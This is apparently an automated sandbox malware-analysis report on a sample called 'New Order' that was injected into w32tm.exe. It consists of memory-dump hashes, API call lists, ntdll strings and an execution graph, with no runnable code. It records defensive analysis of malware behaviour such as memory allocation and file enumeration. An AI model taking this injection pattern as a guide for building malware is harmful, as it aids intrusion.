                                                                                                                              • Opcode Fuzzy Hash: e9d914e6057b48da24ac797270427f615809036cfaae31d19b117cf85df21202
                                                                                                                              • Instruction Fuzzy Hash: 9090027120140406D281715944047460405D7D1301F55C012BA068554EC6598FD96B66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e99a18ccf99aab28d81e778aa20ab27e6689b7ab14868781fa1b76f305b2288e
                                                                                                                              • Instruction ID: 4d59b8518fc20cd6cf4a99cfe567efd3f07b99527c20a6d2d6406c6f5212cbfa
                                                                                                                              • Opcode Fuzzy Hash: e99a18ccf99aab28d81e778aa20ab27e6689b7ab14868781fa1b76f305b2288e
                                                                                                                              • Instruction Fuzzy Hash: 0290026120180407D281755948046070405D7D1302F55C012B7068555ECA298E556636
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 603974b34746af6acd3d728065d6186ff2d5f534af071338eece37dcb55e9aae
                                                                                                                              • Instruction ID: c7a42eb24a97ce5b3773e99021b6bbf6e04b92074585bd99cf927b486d2a6039
                                                                                                                              • Opcode Fuzzy Hash: 603974b34746af6acd3d728065d6186ff2d5f534af071338eece37dcb55e9aae
                                                                                                                              • Instruction Fuzzy Hash: 1590022130140406D243715944146060409D7D2345F95C013F6428555DC6258B57A633
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 01cd92d4f572f8ae4a1fa56cc8216ec592df8c87cebd9eeef30c0c51ee803700
                                                                                                                              • Instruction ID: 584ff8bdcf5ea2a63f7723038de20ac4cb0c3daf818b0036d4231ed90dbc52e8
                                                                                                                              • Opcode Fuzzy Hash: 01cd92d4f572f8ae4a1fa56cc8216ec592df8c87cebd9eeef30c0c51ee803700
                                                                                                                              • Instruction Fuzzy Hash: 1890022124140806D281715984147070406D7D1701F55C012B5028554DC6168B696BB2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                              • Instruction ID: c7fa29ac9f980d0685d23db8d529316bfaa5e36bf7246f018ddd6094e644b56d
                                                                                                                              • Opcode Fuzzy Hash: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                              • Instruction Fuzzy Hash: 4D90022120184446D28172594804B0F4505D7E2302F95C01AB915A554CC9158A595B22
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                              • Instruction ID: 21c51f7ef29b13a5fe23ae6f8ef5884c9bf8a6dff4fa17c5de9d664cb37bfaa0
                                                                                                                              • Opcode Fuzzy Hash: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                              • Instruction Fuzzy Hash: 1290022124545106D291715D44046164405F7E1301F55C022B5818594DC5558A596722
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                              • Instruction ID: a5084bc6bad30e0ee6eb05e3e24b0278c4518a6e0bd8945709fbd791d91ad68f
                                                                                                                              • Opcode Fuzzy Hash: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                              • Instruction Fuzzy Hash: EC90023120240146968172595804A4E4505D7E2302B95D416B5019554CC9148A655722
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                              • Instruction ID: fb9db82e1be6a39cbbbf6dde6c33db016ea35fc88c7bf50e935412d81ece2f8c
                                                                                                                              • Opcode Fuzzy Hash: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                              • Instruction Fuzzy Hash: F890023520140406D651715958046460446D7D1301F55D412B5428558DC6548AA5A622
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction ID: 3614c6967db129892fb6dea05f8850075bcc06a13b5a958a712c0f69544c3b20
                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874725
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874655
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018746FC
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01874742
                                                                                                                              • Execute=1, xrefs: 01874713
                                                                                                                              • ExecuteOptions, xrefs: 018746A0
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874787
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              Strings
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018702BD
                                                                                                                              • RTL: Re-Waiting, xrefs: 0187031E
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018702E7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              Strings
                                                                                                                              • RTL: Resource at %p, xrefs: 01877B8E
                                                                                                                              • RTL: Re-Waiting, xrefs: 01877BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01877B7F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187728C
                                                                                                                              Strings
                                                                                                                              • RTL: Resource at %p, xrefs: 018772A3
                                                                                                                              • RTL: Re-Waiting, xrefs: 018772C1
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01877294
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0188CFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                                              • API String ID: 4062629308-3101775584

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:4%
                                                                                                                              Signature Coverage:1.5%
                                                                                                                              Total number of Nodes:474
                                                                                                                              Total number of Limit Nodes:76
98412->98414 98417 33e2ee0 LdrInitializeThunk 98413->98417 98415 979260 98417->98415 98418 979320 98419 97933d 98418->98419 98422 33e2df0 LdrInitializeThunk 98419->98422 98420 979365 98422->98420 98605 9768e0 98606 97693a 98605->98606 98608 976947 98606->98608 98609 9742f0 98606->98609 98610 97bda0 NtAllocateVirtualMemory 98609->98610 98611 974331 98610->98611 98612 964d50 LdrLoadDll 98611->98612 98614 97443e 98611->98614 98615 974377 98612->98615 98613 9743c0 Sleep 98613->98615 98614->98608 98615->98613 98615->98614 98616 972360 98621 972379 98616->98621 98617 97240c 98618 9723c4 98619 97be30 RtlFreeHeap 98618->98619 98620 9723d4 98619->98620 98621->98617 98621->98618 98622 972407 98621->98622 98623 97be30 RtlFreeHeap 98622->98623 98623->98617 98624 9722e9 98625 972312 98624->98625 98626 9722ef 98624->98626 98627 979d30 NtClose 98625->98627 98626->98625 98629 9722f4 98626->98629 98628 972319 98627->98628 98632 976200 98629->98632 98631 972308 98633 976264 98632->98633 98634 97629b 98633->98634 98637 971a00 98633->98637 98634->98631 98636 97627d 98636->98631 98639 97199d 98637->98639 98638 97bda0 NtAllocateVirtualMemory 98641 9719b1 98638->98641 98639->98637 98639->98638 98640 971a76 98639->98640 98641->98636
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0096CEE4
                                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0096CF1F
                                                                                                                              • FindClose.KERNELBASE(?), ref: 0096CF2A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: 29793147d933fe40f9b59ac61c705eaeae162119922a1950e09688fb18dd4ba2
                                                                                                                              • Instruction ID: a50810b0071455e0fdcf266727d1ef5486118750e6d83c82c0f02434c454decd
                                                                                                                              • Opcode Fuzzy Hash: 29793147d933fe40f9b59ac61c705eaeae162119922a1950e09688fb18dd4ba2
                                                                                                                              • Instruction Fuzzy Hash: E73150B2900248BBDB20DFA4CC86FFF777CDF84715F544558BA48A7191DA74AA848BA0
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(?,?,99DBCB70,?,?,?,?,?,?,?,?), ref: 00979B2E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 6d433a8723dea39743f0cb02000f721a275543db99a97d44697a1fbe081a58b6
                                                                                                                              • Instruction ID: ab8386f96f06d43770a9bc57198d4eae01b2518b97bc1b445a59303d0ba2b597
                                                                                                                              • Opcode Fuzzy Hash: 6d433a8723dea39743f0cb02000f721a275543db99a97d44697a1fbe081a58b6
                                                                                                                              • Instruction Fuzzy Hash: F731D4B5A01248AFCB14DF98D881EEFB7B9FF88314F108209F919A7340D730A941CBA5
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,99DBCB70,?,?,?,?,?,?), ref: 00979C83
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: db79748290b7137ead48da5667c266fd8f65f50ec5e9e041be0b1115778f5e54
                                                                                                                              • Instruction ID: 47f05a7ebee06301d972275ccf30d9d839f26994614418c947fd198b1f7e884e
                                                                                                                              • Opcode Fuzzy Hash: db79748290b7137ead48da5667c266fd8f65f50ec5e9e041be0b1115778f5e54
                                                                                                                              • Instruction Fuzzy Hash: 0B31E7B5A00248AFDB14DF98D881EEEB7B9EF88314F108209F919A7345D770A911CFA5
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(0096254E,?,99DBCB70,00000000,00000004,00003000,?,?,?,?,?,0097881F,0096254E), ref: 00979F65
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: e919035b397d3f590f68ef98e4c4d41492dc07bbc1936208019ea466cd353210
                                                                                                                              • Instruction ID: 00f5e26e40a526dc45bf2da2bf717bfb4e7b77695dcc460e1fb6a61803794c2b
                                                                                                                              • Opcode Fuzzy Hash: e919035b397d3f590f68ef98e4c4d41492dc07bbc1936208019ea466cd353210
                                                                                                                              • Instruction Fuzzy Hash: BF21E8B5A10208ABDB10DFA8DC81FAF77B9FF88714F108119F919A7241D774A911CBA5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4033686569-0
                                                                                                                              • Opcode ID: 0ed73472e3161a74703de569612a60cca9d8b2aab1adf9b0db8315a4c0e2a01e
                                                                                                                              • Instruction ID: 5e24ef2c428024cef961f03b5ae23559a324c4a3b9856c45e3e8f28036b6c208
                                                                                                                              • Opcode Fuzzy Hash: 0ed73472e3161a74703de569612a60cca9d8b2aab1adf9b0db8315a4c0e2a01e
                                                                                                                              • Instruction Fuzzy Hash: E8115172600208AAD720EB64DC42FAF736DEFC5714F108109FA0CA7281D77179158BE6
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00979D67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction ID: a9a6ec031d2127e2ce792c296d1b14a66b0ccc5025fa7b6fc2adcff303f878d1
                                                                                                                              • Opcode Fuzzy Hash: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction Fuzzy Hash: D9E08C722402047BC220EB5ACC41FABB76DEFC57A4F408019FA0CA7242DA70BE0187F5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: bf0eaf44d171245591daa8b5db1304261cbb46635ab522d4ac4b8823aec78e5b
                                                                                                                              • Instruction ID: f5b7e1f9eece2f626c7aefe0823c5b77081381747df8a5b0fd1d1e0402e7ca87
                                                                                                                              • Opcode Fuzzy Hash: bf0eaf44d171245591daa8b5db1304261cbb46635ab522d4ac4b8823aec78e5b
                                                                                                                              • Instruction Fuzzy Hash: 09900235615804169944B15C48C45464005D7E1301B95C111E1424954C8B14CA665361
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: f3162754f7108768ece64a0918b35b22f119e8e5367192ea563ad7b4b825fadf
                                                                                                                              • Instruction ID: fcbeba497111f4679e392e8c6b627cf20798e50f42b10aed1a8bb7471e92af99
                                                                                                                              • Opcode Fuzzy Hash: f3162754f7108768ece64a0918b35b22f119e8e5367192ea563ad7b4b825fadf
                                                                                                                              • Instruction Fuzzy Hash: 9E900265611504464944B15C48444066005D7E23013D5C215A1554960C8718C9659269
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5c8a432d8990f6300fe95995f447e7c938309fd8b2fea8c62bc1cead6c540835
                                                                                                                              • Instruction ID: 3170b1532d7a7be5c4869d26c3daf20e93c1424b6d28950ca510e2ac8e0704d6
                                                                                                                              • Opcode Fuzzy Hash: 5c8a432d8990f6300fe95995f447e7c938309fd8b2fea8c62bc1cead6c540835
                                                                                                                              • Instruction Fuzzy Hash: 53900265212404074909B15C4454616400AC7E1201B95C121E2014990DC725C9A16125
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 58a884f45b61bf1a2d07a57b4c3e7e8b7e9346a6ef5e93d8f8d525730e0fd083
                                                                                                                              • Instruction ID: 4859f5274bcf57588ecf20f9f71385ce587c3205b410ca0687fa1f7b9607e830
                                                                                                                              • Opcode Fuzzy Hash: 58a884f45b61bf1a2d07a57b4c3e7e8b7e9346a6ef5e93d8f8d525730e0fd083
                                                                                                                              • Instruction Fuzzy Hash: 6190023561540C06D954B15C44547460005C7D1301F95C111A1024A54D8755CB6576A1
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 522 961542-961562 523 96156a-9615ba call 97c8e0 call 964d50 call 951410 call 9724a0 522->523 524 961565 call 97bed0 522->524 534 9615bc-9615cb PostThreadMessageW 523->534 535 9615da-9615e0 523->535 524->523 534->535 536 9615cd-9615d7 534->536 536->535
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 009615C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
